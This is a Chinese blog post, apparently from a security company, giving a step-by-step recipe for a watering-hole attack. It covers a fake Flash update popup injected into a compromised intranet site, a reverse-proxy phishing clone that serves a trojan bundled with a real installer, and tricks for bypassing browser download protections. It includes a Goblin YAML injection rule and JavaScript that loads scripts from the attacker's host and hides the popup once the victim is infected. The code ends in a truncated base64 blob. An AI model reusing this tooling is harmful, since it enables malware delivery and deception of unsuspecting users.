基于反向代理的水坑攻击

杭州默安科技

于 2024-03-15 15:59:00 发布

阅读量1.4w 状态模式水坑攻击网络攻击模型网络安全安全

本文链接：https://blog.csdn.net/moresec/article/details/136742308

0x00 概述

一套基于反向代理的流程化、模板化水坑攻击，全程只使用前端，做到受害者无感知

使用的技术：

1.jquery

2.postmessage

3.基于反向代理的copy网站（Goblin：目前最成熟的制作反向代理钓鱼网站系统，地址：https://goblin.xiecat.fun/）

0x01 演示

模板有很多种，如flash升级、浏览器升级、插件更新等，这里以flash为例

1.首先通过打点获取一台内网服务器，只需在开启web服务的html里插入一条js

2.用户去访问该网站后会弹出flash升级的窗口

3.用户点击立即升级后会跳转到使用反向代理制作的钓鱼网站，域名可以购买和真实网站相近的

4.用户点击立即下载后，会下载提前制作好的安装包并返回原业务网站

5.这个安装包是提前篡改好的，将马子和原始flash安装包捆绑的。此时用户正在安装中，安装好后会重新打开或者刷新网页，flash升级提示的窗口则不会弹出

6.完全模仿真实应用场景，使用户不会察觉

0x02 关键技术点

一、当用户下载文件后能正常访问业务网站

1.可以在马子中添加代码在本地开启一个http服务并返回数据，当用户访问业务网站时前端会发送一个xhr请求去马子传递的数据，若获取到了则不弹窗口，若获取不到则弹出窗口。但该方法较为麻烦，需要定制木马并且在后期清理木马后，该用户访问还会再次弹窗口。

2.所以我选择了使用localStorage（浏览器本地存储）进行验证，localStorage用于长久保存整个网站的数据,保存的数据没有过期时间,直到手动去删除，但浏览器是禁止任何方式跨域获取cookie或者存储的，所以让业务网站自己生成localStorage

3.首先在业务网站的js中判断是否存在某localStorage，若存在则不会弹出升级提示的窗口，若不存在则弹出。然后使用postmessage在业务网站的前端开启一个监听，并在钓鱼网站中使用iframe嵌入隐藏的业务网站，当用户在钓鱼网站点击下载按钮后会使用postmessage发送数据给业务网站，业务网站收到请求后会设置一个localStorage，当用户返回业务网站刷新后则可以正常访问业务网站

实现代码：

业务网站 flash.js：

钓鱼网站 postmessage.js：

二、绕过浏览器保护

1.js实现点击下载一般通过a标签和window.open()实现

2.因为点击后需要执行js命令所以原本的使用方法是通过

<a href="test/123.exe" onclick="test1()">立即下载</a>

或者

<a href="javascript:void(0)" onclick="test2()">立即下载</a> ，test2()中使用window.open("test/123.exe")下载文件

3.但第一种方式会触发浏览器的文件保护机制

4.第二种方式会触发浏览器的弹窗保护机制

解决：

1.原始的a标签不附带onclick事件可正常点击下载，使用jquery进行dom事件监听执行js代码

实现代码：

flash.yaml:

flashapp.js:

2.使用form表单进行下载

chrome.js

绕过浏览器的保护机制，文件直接落地（仅限ie edge和火狐，chrome依然会有提示）

IE EDGE:

火狐：

Chrome：

0x03 使用步骤

这里提供flash和浏览器两个模板，可以根据这两个去添加更多模板

1.首先安装goblin：https://github.com/xiecat/goblin/releases

2.将下面的模板修改好配置放进goblin的配置中

flash模板

1.第一启动goblin会在当前目录下生成goblin.yaml，修改Site模块下面绑定的地址，可以为IP或者域名。设置Plugin: flash

2.将flash.yaml放入Plugin目录中

flash.yaml:

Name: demo
Version: 0.0.1
Description: this is a description
WriteDate: "2021-09-06"
Author: goblin
Rule:
- url: /
Match: Word
Replace: ## 替换模块
  - Request:
      Method: ## 匹配到如下请求方式方可替换
        - GET
        - POST
      Header:
    Response: # 替换的响应内容
      Status: 200
      Header:
      Body:
        File: ""
        ReplaceStr:
        - Old: <a href="#" class="loadLink">立即下载</a>
          New: <a href="k17nisptee/123.exe" class="loadLink" id="download-flash" download="123.exe">立即下载</a>
          Count: -1
          Append: <iframe id="child" style="display:none" src=""></iframe> <script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"></script> <script src="k17nisptee/flashapp.js"></script>

将a标签中的地址修改为木马名称和<script src="k17nisptee/flashapp.js">中的静态目录名，k17nisptee为goblin的静态目录，为随机生成的，可在goblin.yaml中找到

3.将flash.js，flashapp.js，ui放到goblin目录下static目录中

flash.js：

需要替换 target_file和ttarget

var target_file = "http://www.xxx.com:8083"; // goblin的地址
var ttarget = "http://www.xxx.com:8083/k17nisptee/ui/";  //goblin静态文件flash存放地址


//根据ua判断当前系统，除了Windows，其余全部跳转到正常页面
var u = navigator.userAgent, app = navigator.appVersion;
if(u.toLowerCase().indexOf('windows') == -1 && app.toLowerCase().indexOf('windows') == -1){ // 非Windows不检查check
console.log('ok');
}else{ //Windows下检查check
   checkStorage();
}

//检测localStorage
function checkStorage() {

var Storage = localStorage.getItem("download");
if (Storage !== "444bcb3a3fcf8389296c49467f27e1d6"){
update(); //不存在cookie则弹出窗口
}else{
console.log('Storage');
}
}


//监听数据，添加localStorage
window.addEventListener('message', messageEvent=>{  // 监听 message 事件
if (messageEvent.source!=window.parent){
return;
}else{   // 验证消息来源地址
       console.log(messageEvent.data);
       localStorage.setItem("download",messageEvent.data);
}
       
});

function update(){
var head = document.getElementsByTagName('head')[0];

   var s1 = document.createElement('script');
   s1.setAttribute('type','text/javascript');
   s1.setAttribute('src',ttarget+'/layer/jquery.min.js');
   head.appendChild(s1);
   //console.log("添加 .min.js");

   var s2 = document.createElement('script');
   s1.onload = function(){
       // var s2 = document.createElement('script');
       s2.setAttribute('type','text/javascript');
       s2.setAttribute('src',ttarget+'/layer/layer.js');
       head.appendChild(s2);
       //console.log("添加 layer.js");
  }

   var content = "<style>*{margin:0;padding:0}#flash{width:613px;height:324px}#head{width:100%;height:66px;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAmcAAABDCAIAAABWcjVPAAAACXBIWXMAACTpAAAk6QFQJOf4AAAgAElEQVR42uydd3wlWXmm9/+hu5VaWbrSzUlXVzmrpe7pniEYG2xysI0DYAxmwV4bsHfB4EAyJhiDjXfxOtsYGxwIE7pbrZzV3ROAYQKYNExmvYbxAPu851yV6lbVLV1190wPXvevRr8Kp875zndOfc/3nipp/suPm38v9f17ye6/F/v+vcj174UV/r2gwr/nP7H/nvef//7z33/++89///nvCf/3/Cf8XyXoVIKUG2R+zDkE9MPxv4DMr56ev3322eebshdbe3eSYzvxkfNtvTu1yfPR4QvJcR2yHxm8EBs5H+k/X5e50Jg/n5m80F64UJ++UJc6nzu2Ex+92FLg0vnoyIX0uIpRW0cflyh8kWL1afYvUkNTdrs+RQFqvtDZd6G550JL4UJ6ghYps300fSE/rcopX5/Y7ug/nxq/0F6k2E7rXjFVyO3ZqfNNednQnLuYmrjQNURV1H8+Nni+e+j80Rxmy2Zq6+w7j52YFBuiQq7K7Eg/9sgG2mrr1X5qSl2rS11sylGMOlV/e/Fi5+DF+KjsbMyqifyM6YhpOjqMx2jlYlMPRm6n1Ck1XZfi5E5m/KLpy0XTxA7e6BjYUZ10n7tGdxrSF2ozF9t6LvSckFXNOZ3pGODqTnJUhpkhuGD8pnpaey/2ztAjWqfk+fb+84kxhobKz+NJ/BPV2N1Sm5AZidGdwizjojrpb22S8/IJtpnDC3UcxjW4uqQzOzUJe8nZcX56Du1dzuacMTtx+9N9yVNDpds9ZzznAw/Lmy5d+g9gv/PTuXqxRsPET2ezh+4ygeaFWOu+5WJN3F/YaciW9DThORNuQJW2BTqkmnudmVzZwnigndbP9qTjc7fz2Xcf+u1ko113026P+Szx+zkedHKf0XGPiGcLmeoHHRHPI+C4yO2okJkcMivM+USl8p6+VPncPR726xFoyNzec+zrN80/+OCDoib/Efov9MwS9MHeTmPuQuGYGAkejuYI37ckxrXf1sPJi7np80czYhtneo+fjwypSYJ7anwnPUF03ukcoDbFa/bZugbP56a4EQZziwBMydr0TnuvSABiG7NUqObShg0Ua80LYOnxnYYsFDHFhncaM7Sy09mnVuKj52vS2LbT1gfnoIW2jiL8oHVYazEsU/FRQ1JEyU1xCeRcsGjpHhBybCqQn1E94nqWhsRUICSmDpYqZL/NWJubAkUXDaTPp8bUkdaCKrd3HZWFwmphGs5ZuturtIhXt49md0S1YaGOkaMv8RGoxiU1gROohGq5hXuT47K/JadKmvKgF1IK1dyIK6iEalvzKkx+QO+wxI50amwnOylgN2Qpif3bOFPgzGq6OHOiJl3+xNrzCeeRPtB0DDqf8IfUQCQ48cgTrfznq3hO4s7P/0/svyJbUMxKBDIyJKZX2vy8CT9j9/1lDtqRINvi5XCK+3AV96RKlxCg1YUrPTrl/Up4GBCIzKC5GvfPxipzuGoywoN6yTXVE/vmpoGpzBNpfyly1qe/duO5XWoS69uL5/tOCD9QpzWvgB4dEOqiw9uJUUIz+9utRYIycgq1tF0vWcm+ZYAUoRGCVtJJLxLNheEUKs2KVwGAqgjxTXlbbCcPUIdoTrWhtOJDAiQ8E0QnJJ7gUEOSYoIWDYlz/YYZI9K11G+0nQWPaAp1uEonkWKdA0Is5AAzsVHOb7eoQgEbqoFA7MEMyJSdslmC2JMauxgV8vGDaoBqXYNiXn0GhygboBWjI2l6OyL6yntQqndaOpKmd+2nIVUYGTRUK543OQ7naW47pm7KMBRhZpKSSlCohF6jHWmaSjqKtE5/S0TsHuIuQ3SxUPbTKYQ11XI7cj9tEgg63lpAp2osELWNeeVA6OaIQXVNzM4AZ97I4Dp/HKkYAauYwU7oibvDn4ciB3q6PDG08qT/j29/4Oa+5A80lU2Nh8idSvUHEu5ydEx4aPM3V40KDA3T8XIXBVOzmjENHOJKYxQ4NJW1ZjxwdEIqP1C24ZmNgend5W+h9pQ9ZYHz7Ulkv0tj3FqYKlFzpzkrhqUFD+3Ups/3TBOU0ZTqFdjIHdMCI3AiLmcmtyN93KIl0/w0GNiuTyFlRFajnHTYWthOTSrcN2W3jQrUaiQ9bM5JY1GsIb1VB2Cy25mJ0monyNGy5Bgw22pMo//QsgbPKS14gufoiCrEAGm7MZBDDRBrpzgjtBgSCzxxAVLSDYOxrU0ySyXThuuwvM6YFxkQ/mEq9DJLrNgpQrcaa3tmKbZdA9rzdkWXW7agYFLU3GpIbR2JbzdlAJL6BaVIKTr6ubRjl2cpbxZgKSPIUYCSZj1ZXY70WeJyCMhxtTIGtHt94mLnoJrLz6jXsjN/3qYsDBDmQeK8qYTm6lNKWTKTW1H1iHqU5UDTRrFffjC8P2+5SA6UnSzlEEFBdpv9/XTSlVU/ITSqXsMdSOf9ANnvrBr5A0H4km9IWA/XRjsuhbTjOxNevkpyXILW9PPS6W9gnfuyxENif/37GrCvuHScEzo0scuaewcM+gd6UiqNYGCZg860S0iqDrqi8zjZv+2UOZopUVOYae5R6ExMbIGu7mEF5YiWQ3W+PiUdRhRu7wUYupSZkiTqKGrVsbNvOz221W442lSQYDXvRLVxS3YShapbOoqbCLU26ULO6FJbHzATmbS6OyVpBcCgVGJMSGvRa0KzpDmiW2pjWi81onPrqNYet7sMYLChJgWidFdHv+XHtllN3W7MoaJkFT3q6qcSKCK5BrHqIW5alwqzkn1NeQ71hjI+QkcEsza9vMRCOqg6E6NCVGpcBtenKAOraGirQRJZ9oO9+rS6qa4dwxJjZI7z8q3qTwrS+SnZcFQaF/duw0tOml4bw8bwtvappHh8u3NQfamNCX5c6plWokCLiObYsBzekBaqcdFueqGrVJid1DIABqDjU1NYyHkO5TFGJzlJ4c1aReTt3fm0TRJAQxaf5rzlKMmBO4bak85P96HnvHPVfclz1V0s8F5/SSUrFW53G/wfwH5nZ6ccY24zPIdO5U4N/jLB9u9unmr9DXmqCqy50o1+V1gLnTEKaWvfLlS5hdsW0h2PM6v0T2BVfgd6ZqN/O+8672ZzYAYTOA939jvvmYQhk9yZpY5PPN6rvi2HRntZuyuJD/fJE2+/dS93veQlLzFaE4YhRwjuzXmCOxt0BH7E2e2e48Rc3WZUEWekEZuzBO7txIhUV3uvgnh63LAnqWVJhGliTE9Fs2AgEsPatoKKJcc2mwQzHeYmBbAarUaKVZAJSKCZkLbZacC5WZ9U6IcBtHs0rdAPgDMTIqVBr1Y+hYTUZm1i2whiLZk2piisNeHYIGVkEtREZrX1bdZkttvyW/Fh6qRFeQQlqixBlYiRcB3MAxhZldWyZ1JW7RxNWsVM/ehgiCimRge2WnvoJkpXnM5O2JRCyjI+qprxElRD5OUnrZE4hK7hBBGRrsFaNG5r0XhAylhoNFJSZnMI+0kg6CwphemC6q9Ny0jjvZJepy0Ed/cQOxoOXJQaM72AzQPSzdRD1lKfPG8SEcG7VdK2NC1qY1DzfK0Bpyuo+dESDoy98nVx56cfDNu+JpxJHPK8HehB+o9kf/W0CAnc/rB++Vjah8ShOHcHrEr1VIp91ecoAbeXj6l9PaH5v3vVXcBDzUB7rgjF9ywJB/CundUnB1UStPrBdSdkgY9G+I3hs7TKKXdV7HfKAM5daoINFAwBmmvm7dp2fFDQaspsxUfsOqcCdNysTxL6mV7s56dgD6qFsC7+AQBqkEgdEJmaDXvQN/kZaa86SJC2SN7u0lvSra4+KreNblI/1IF5zVlVaDGcmFDch6/IspiRv/AjMwGtIc1GjUEvrAWxRjsKulbOAh5+gsbU6Fa9cRCt9MzIMEC+KwG3GyWjUcCqE0iD3vqMXJE/phYxvkmk19aUUVuY3Tu91VygpOiSmRCBIkNA2grc7ZYc+5v1aXlMDhk2leRLrUO+poL5PEeuJnsQxkBdz4xO1pvURB9PHaMqpSOd/UpfcBH1N2VIRzZ7Z1UtGpexIEuIi/HUs9GYPZ+ZVEciAxtm/VkG9J1QBkPrGE+Lpo9KPuLDdJBsgCxEgvtIyplGWzVRObxyzPJc2jeOhBQIFB/h89WBk6NRAmuodPUHzv7qw4qt0x3ZPftV9m4nqKqd8toOhMnt6u69BCB50OtvyNOLQEvcnfV33NOvcIr7ne+MYyVLqpmi5ZanqnSX4vNBmOTJBf0jePnDFH7V73N3Snr17T9cWoTbMcu5oib/CUjEbiioSJrUa7+eGakxu5qalcRkf7OpR2Xyx0rNg7ritQBvk5hOdI6PK9BbhCRGuGuzLqaSVCJm9Ct8s0/cJ7435gCYkEBDiEjAWZ+2WnazrShaR4dEBfQr/GjtAb38NEpL2lEyKzq8UZNUYUjZPWQZb76mGbUkhhn6jil3bBOt3JDV7QkhH6WIndJ86fFSR1CThlUSbY0ZmQdm6C/qEDPoskGXVlnNyq3R4urypr7QGYFb1Kl7C7MlaYidmJQa3cxNy35kZXRAPtRL1jR3iWo900Broy4B8wR+k3NIiKcnBPtmfSElrYyRBfGeLEGOSoxsZsbl85Y8TehGyhj+aQU4d2wLa02CstGK6NSIlPqLvkSh4vZ6rVpLj/YeJ02hJGkKnsQVSkT2i+bVPOf+rM0zcQ8USatpPeQJ/AG131lBcq8NVgpGIUHZvV9JnwVerQbSlfBTpYtCIBHYtcAK/SeV/lYXx92e8SycehziXqetlJ0cNBZXmqiXvyLtmUuBCAl/QAInfwjVqkkCDjofAufwVbGffMUWIEJy14tf/GJRU3g4ml2P9G8XpqALh0Bop/daUdDAQ5wgfBPWCdCczE0StQnWRPyd/lPScEezKpYYodhm9yDFxLOMEakNKYgIHTcFrcL6kdhmbEgRPDEKJERZdlByjT0gZCutb3Q3O/vteqagBRi4VBPX+zl0EpILQHb3C4FmUVR3NeeF1eiQBBx1QqDEiGzD+I6+reJxadnGtAjBXVhIi/VpsSc2tNUxsHk0xSZcUSGA5MGDTx1FUZwbEZcdvboLq+olJekg3dnoUq+1KmsWh7EN/FBmOz2mauGoaf183wnq3KD1hpReGKcmN1NjXBXVSCy6BzdwOD3Ch9kJuEvTGw1G5RuHS823ZMXR9LhK1srUzeQIdDT6OIV54jGk7xzUoIDJosEh3GW8u4D3mJxv0L4Z7d9KjqkMviWN6JneKc5wSJ120uBnPL9RGy3t1CTtjOGMOYw7mz3UVNndnJPuncCtUo7vj7mOVZ7N3bpTILAe9+z/wbLfv7lvD7TQ3RfnkCzKf/JA/Tpo+X3t92wh0dPdkLMf7gd/Z0t+2B0Uz2ElpRiuQQMpGD55/KNjEtxk+NA4pj5+m3tCVpql7qzaucuzU2mg3fW4D6u3MHxcHm/7ncBoKyxRk5ioZwNCRAa3B67dbC5IfICE4nHIt2URSFwWbJIoTr3dLCgQqyIoRfDNTwmo7b3UACR0yURzq5PWjyTW61KqKn9so9mADexx2JwXJFp7KCbm1WsObXX1WZxYtBDlN9qLUEfWQ1AutRXlBe6Kj2xlpgxLEuJEdEhMNfsSoKjMes1Iib+cgTRQQUB3DZVEJ8Rtzmz2zqqtll4BqVv4MUxNGq02oUtQsz5JSiFQgR8cV6fWpUGj5lUifKIvUZFSzu0QDtVio4EcuAJUbM1aqt2ByjktqyLEqUdS26BaDw+OleWSvHKRTQsgLiXpO2gsCMCC/dHSF0lKUNiPDttPjeggJddr0jTBITWsH80o14kN4UOt5dan9VaVXuQmBUIcjvdy5lVrd38pJO0C0hOzQqLeQely0PKbh2Ns6tqRmP+Wg1r1/4/9V8sPV3DDY47TnH3rTOeMc3i1tvAc6/Gr+UqNi+NVOZOQfrX9eVCXPsH2i5r8ByM5WKuJoc824mN6p9g9pDdkSKiUPocxMOgrLWMeTSOGpMlSk8RrhfvYkADTVrTFtvKz3AXMIOVm9xABWuQzOJHuQf3Up2lIshLmtRe0Stmc24hLP4kBLb0We+stBckjINQzvZWeVA1EecADDlFLSCWIhSAz6hPjN1MTAkBnUVQD+SANPrWpfluhln/rtai7ER2UAG3KrdfGJRYzUxLTnUVhFcmYGUeYat0SWZmb5pDyeAN70JcQEYSLiEn9uup2R/96fUJSEvuLxzc6e9ePakm2VE97H76i10IahLMd79QnsnJgo8FYdGgjOUrNcn5rry6BQ+NMCc30pASoeXmp9AJPRgdLktpmIdxo+ms+3SL5GC7RNza8kRheh6ONWWUwSN7kmBXxGiOK5fR5s/ISI3O5hKk4xDUXE9WHdTcP7Nz1E+LSgua+Af2KxK8fdPsv2bBSxLlC/X3S0veSM5UnwC2ettyJwlUxw+0oR6VdWQo+Md25gvYHUHNvnOpSiqGZqfXugY36rAJucgQ1hmRRV5uyCtPdfZwnHBO1QR1oJPRbDimy2xd14Co2ZFcCFdzT42jKdUQMd/WdJNCrwrqEKgd1KCHu6lLs3mjrU4WNeZCzndFir4qhrtB/GVUisKVG7Zon1kof54/RnGXqhpGAVEUxayE1UKGYSg09oj5Nqx7IAXHjwzIeAcfVmPbBtmQZAtRIOlHWfJq0GSlaqoHYTbOkuV6bBEuSg7jL6DYygC1zVfZ39BnYy2bZxi05CVDOi0wSysPULC3IJZRxcUb1awgSVKJqk2PyEvlEYnhD/c3K7NgQvRA7a6NrdXHhk0QBv5F8UJKOx4Zpa92Mo74PGjglAEPuhowEZWoch1sAS7VjarMhd2dxmy4z0G09yg+OJMwWCwSn59mu5gHwxOhwYREYNcLji6f+cNue/Pa7C+yrwDxNB0q0K6v8AtuqsteB2+MtTwPP7KtoK/nzMg2oZEM1M61KGyr5+aD+v4JP2eVkD4HOvIr271FTWvOw3mYR08UJE7WJ4Ais9YgiviI4gEmKWCBEOrJLC6RbhZkNA06iMwArxWjzC46bRrBqQZVQ3nuCMpBGgb53FmbAYJEJFmbGLXqRlTuD1xG4N5tMW2ktbOpzG2iBUEtPSjkR06kzp7eDCvoY3NZrr641pIHlpl1ibStIRzYXxJjicWu8iCtSjmhR1+yrp815Se12fcRLNy347bKq6N6Yl5gzdFwXKcVmAGNfOhqbtVJqlpfRkXmhKCVUl5CWGJWo7ejdaOqRXkTHR4dUZ0MST8q2+PBaTUJeMpQVHZt61hoz8pjUdp5OqVqUYnqcgZBt9jug3lnRHd+SmqTHxcuGjHkxPGkLK7MhAzBvT2U8XmWA0lqetSmLYJk/puUEdDz20BdVNbbeVaSAFh7s7KkNmEmV4pF7ntnpdMkLL2UPRm28tFVBgmqeoie5/dUg0x+aMdh9yWO/5y5/Jfb2qyu2qlyhLZuTtWWHV3wx4KBxvxo+hUPUM5QhedKVGike9tIsdbn3cry6L7GcyXZFcrsn2P4XvehFhpq7T7Wa5yds0yegYxsd/Yra6Jj8NPFXobYuoXhNxG8rSmx1DYpeUMq+nsxPwbBSzM1OIK3MazkFer0gBEtggMoz48JDZ69q6OjT7TAVRVgXhxkb2SnJPugVHeSS2kKncrU5tz10HeXBrerkLiykkiZ9xyTB19a7ZqM/OlX0GpPjkGimaUSVSsaHrBxUW3SHJnqOrYOfo8L2OuIPkd1ehGT6ZscKR6OeJRaRql1D6/UJ1ZMYsfoPg6XqpNJ6S2IxqiboO0JNahW5HB+TpGs0duaPydS61Cqw5N60TJXT6hOb5nMnqxSVCgDOvuPaMbTesC9xk6MS2a292o8O4RPdGJE4RsSL0/iqyby8zEzgK+l+MpuMPgPWEDepI1v9J2Q8wwo4I4OS2nScxKU5t9kzZXsdGF79IaDSo1up2L51hjQUOI/tAxNS4D+k/d4AbZ7cwM39aO+drIzPEOMrybWDeuMSZFCl5KaSDR43enpdCnT7wSxcOHoSlLLDcj9XSomqp6mn/nDpfGlODpyElkOln0fKelRptrhN9U8/z074hHeqCuz+E2l/KTnbvaVETVsdN7CzekQ/JaSI/tkJqLnWmJIUGzy1GRsCNnqNpzeIk2vNPSgkrc0WpkUFrazqAyLIhJyimL4M0pvLolgImeBTWw810AS3aGkxMqDauJQY35KULNCcpE9UX69cKEx/6Q2/9Y2//uQjm9vfuff+7z726GP//p27f/W3JbloLmp+tQM0grG6jHgwcNKCBCBJyyZGKCmowInCNPtoOLGha0Art7nJlbqk7m0zLwstjEF4z5SgLlkcB8mkC5Jf4nFaci02BLG4URamR60El0+go3kDapZnRUctq5o3u4BcKMqahegaUZxWJNBpsUULucI/ZK1PK9VAXhdm1jGgMU16UcIYKrMljw2yMztFi7KtIakvrXqmrVLXyUi/jGdEUNIAmCbiI6XCtEIGQ80tSPCkBg4hCylRva3C81b/yfXIAP6RDdHB9cykBqsljyfXa7pL8+ZIzJNd7aVZrhgdHp3dUSwgxFeI4+76mTx2ivLTXvILREdpOYdOEvqDaP/eQ+6LQf7ulF2qEKOdx9xvfzj19z3psdOzVfJbmIbw9dfuO250n3EXcxdwNmubUyxQ23kCqCPEdVi7T9f8Jyt5wH/SPSKO8c64lAwIhcceZirPz+DNZWrgxCizpGZvcnofjSr847cncH4GJ39Xyf4y3rupacdp9UjcPMwJlUblZMYV7gnE5r0jMX2zc0CrrLEhLWZGB4nsaw0SXmIGAo5KCdNQMz4kkcot6JiU3s9JYrYV9e4zK6Vl5OygXTlcbcqbiC+mgjFu/NIbf+NbWxe+t/vv+991dr9395vfqQrbixaH0ky904T7lZqoUJrWxzJa4cTm5Oh2z8xqvX41Re/5CjO6MTJgBS76b71b9mu5EpOS4/R35YhRY4lRFKEAczQHgzeSkmXs25KyExjjH3QzHQROXYO0IjGaRLQNib7QrrN/e+BaGlqjktp06a0tAK5TCkLTdqFYh3ALNBavBWbyTGPGCmJhFQUMR9UprXVzScQdPMXhakuPjJeQHbFdxlT1MaOOrNZqIKRxiydQz9SDGZaUeuNbp2o387N0h0o07qQ4+WMbea0NaKE7ahzbNWgXpcuf4UQp4pemUcIfDcMnbsjT6+DEXY8nmjjscZ4iix//w+YxY/fwB8Z+/2YfT4+pnKwkHHcf6qgb1SG9C1ClobSrdLViWK+5YpvTtAeWTh/L2GmQs9d9c2jdXirsSiYuwU6Pkx0PVHK1y2kJz5j6qwrxeSUMH9T//rYcLWgZE1jMLeI9sHdKVsoy3aN2+fPn8bbffZKfoib/VZwKTVl0D2xQUD6a28hOEMFRWirQrNeTa7FBG+sla2LDa5FeCa/EGGhZa5XcVKCHuxm9eNOiaEe/IBQdWqkTlbm0Aa4ArdF8oPfuN/7Wv93z5e9V/nfP6/+7VjV7Z8Wqo2ktlnYPWnWrZVUagkxYgqLlaqRfNGrNQ7UVaIT6TIyoI+bDGSHc0FccTY6W7tUCbFq6sGuA7q8eNXQvzNBxeQ3Ym6XakgCl7zQNRNk3y9p6V9pzjOaUT6jvWlOFW1pKJTMAaY1ao5Y6lJ6bwm+qtiGpz3CAd3txrVUvkoXYqDIP8Q9RmJFSJL3Ab/BSyQEOx3hkenpyu3BCCcfRjLyaGAHkW/kp1dmUZYDUaIu+FVrhxuIJHUY0FmtWr/cdl7talbisx0apWcY3pNfImfqOI7XX9Oa1bBnQhOlEKbetjTuTstJU9sRr/xSvdN49of1peIX6E+X1JALudQw+HA0PhVfP/oTHcn9I9YfXELFyCXHffTLw0KF4JYdUMiYcCb6TbleUuSWwlUBvVLakJDhszbuh2WklUcGMMB9WlXsdPtjo+AfI78Nw3DqZRJh55c9FqIWJSs/XXmq4q309tXkez905H9/VbNrcNZdp7qtnv7uVF77whaKm7zmMu35G9QVQRmoMXhK4hYHYsJiE2svNWCpQWARK6INbwu4q1hCIU6MwQCVt3E+Pc4m7VltyWu/t1JKp0JIc/cIrfunR//N/vve9x+Did79bkpbf//737c53v++i5hvetlpvEJ4cBbpwWnbSRHzIoLqwfDS91tlntSMCUSqw5xh8AjAQiAJr0SEtKXf0CQ9d/bIfZVwrbnFpc+AkWKIJLcOqiSk6pfoF9ck1ff2b0o2U7J2lU/RUh60FATJt+ovWZD8+JjkInLoGtHLbewLEStihfVMTYhsytDlHPUBOTTdm5DRzaCXgSmMOdOFDy2/5k47APNsRA2xVG7FvdvXF7JpdoMY/MK/3BPbLIbVyuJQ39nf2abW203wm3Wbsgcq5qY2C1gC0Cl1HeqH0SHK2oyhP0iKObStqWI/EyydJ3B06L23zkyOkZJXECq+hmraehPZXulR9X3yxNeEZ0H0dWGXT4WH9IK3E3ZPNfTKEwZXctVJTdpJDT7ED9b26LV5u+eXXdonzs1L+Fz5Ldaa2rLz14YFa38+2RHjvwvPXq2L/HjVDnnw4pCgPoojycK41D1qI3YIoTEX3oEgIskfT6LkNI8KW6+P6iNS8I4RMWvlEyiSGwRVliONaNkxILa00JL702+8zpPz+96r4d/fb3gOHVhuyUpPdCKmxNclfvbpbjQ6I3xKIaS1d9k5jM01bOq5hJMoYaoKf3MRqpE8G10QhutCYmRRCagxgeo3AQh12FIAW2KAk3qe/kl8wL6Ierbbl1WJuAmitIhCT4wJPVz+VqINC0Qz1cK9ohLwDaVzFmNig3lxiW52gRQGRMj1mfQjw1LrdB6WpcbMIPGANoINaIobWcJThoKruQW6RB7oGhdj+a+mCaiZBSZUEtHQ2/pfiHwSKUt4tBQ1izyz3qnctOaUOWNgufqseJQFjAjngJyfoP76Z0yjjMRNu4qW4U+sVT1TmGNYAACAASURBVP5H3T2PnVtszHLKOIfLR7pLdfKz1kz92v1n+crh7kugiP+uHwj77RDsDoTvjGnXc+g+U255WcDavRR3Z/3uIbaHTj1XCjOV0OWEVCv1PCcDItWRbnc3ObRnNCgu3+qkcfglGe8HYbyakSobncPdnsHab+jj++LTTccKYx0PpEvI/LdecrwXNHOqHV+qCgJe3J0GuZ+yynP1KthfGqPa0rPg0ZrxIK0ZV4fRWMRcwHM0Z7RLz3qvwuhKg1Y+ifKiS1MWvkIj0EKc

立即使用